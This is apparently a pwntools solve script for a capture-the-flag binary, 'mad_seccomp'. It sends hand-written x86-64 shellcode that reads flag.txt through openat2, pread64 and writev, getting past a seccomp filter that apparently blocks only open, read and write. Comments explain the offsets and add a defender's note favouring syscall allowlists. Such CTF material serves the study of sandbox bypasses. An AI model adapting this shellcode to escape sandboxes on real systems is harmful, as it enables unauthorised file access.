
#!/usr/bin/python3
from pwn import *
# Solve script: hands a position-dependent x86-64 payload to the target and
# then drops into an interactive session.  Everything below depends on the
# pwntools `context` already being set to the target binary.
context.binary = target = ELF("./mad_seccomp", checksec=False)
r = process()
# funcs
# Thin wrapper around the tube's send(); kept as a one-liner for brevity.
s = lambda a: r.send(a)
# shellcode
# The payload below assumes that, at entry, rax holds the address of this
# buffer, so every rax+N / rsi+N / rdx+N offset indexes into the payload and
# the scratch area just past it -- NOTE(review): that calling convention is
# not established by this file; confirm against the target's loader.
# It also assumes the assembled code is exactly 108 bytes so that rax+108
# lands on the "flag.txt\0" appended after asm(); any edit to the asm text
# shifts that offset -- verify with len(asm(sc)) before reuse.
# Syscall numbers are the x86-64 ones: 437 = openat2 (rdi = -100 is AT_FDCWD,
# the open_how struct is built at rax+200 with flags=2 and resolve=16; the
# middle field at rax+208 is left as whatever the memory already holds),
# 17 = pread64 into rax+300, 20 = writev to fd 1 with a one-entry iovec built
# at rax+400 pointing at the read buffer with the byte count pread64 returned.
# `mov al, 17` and `sub r10b, r10b` only touch the low byte and rely on the
# rest of rax/r10 being zero already (fd < 256, r10 previously 24).
# Defender's note: presumably the target's seccomp filter denies the classic
# open/read/write but not these alternative entry points -- confirm by dumping
# the filter.  An explicit allowlist of the syscalls the program actually
# needs, rather than a denylist, is what closes this class of bypass.
sc = """
lea rsi, [rax+108]
lea rdx, [rax+200]
mov QWORD PTR [rdx], 2
mov QWORD PTR [rdx+16], 16
mov rax, 437
mov rdi, -100
mov r10, 24
syscall
mov rdi, rax
mov al, 17
lea rsi, [rdx+100]
mov rdx, 100
sub r10b, r10b
syscall
lea r11, [rsi]
mov QWORD PTR [rsi+100], r11
mov QWORD PTR [rsi+108], rax
mov rdi, 1
lea rsi, [rsi+100]
mov rdx, 1
mov rax, 20
syscall
"""
sc = asm(sc)
# Path consumed by openat2; it must sit at the offset hard-coded in the asm.
sc += b"flag.txt\0"
s(sc)
r.interactive()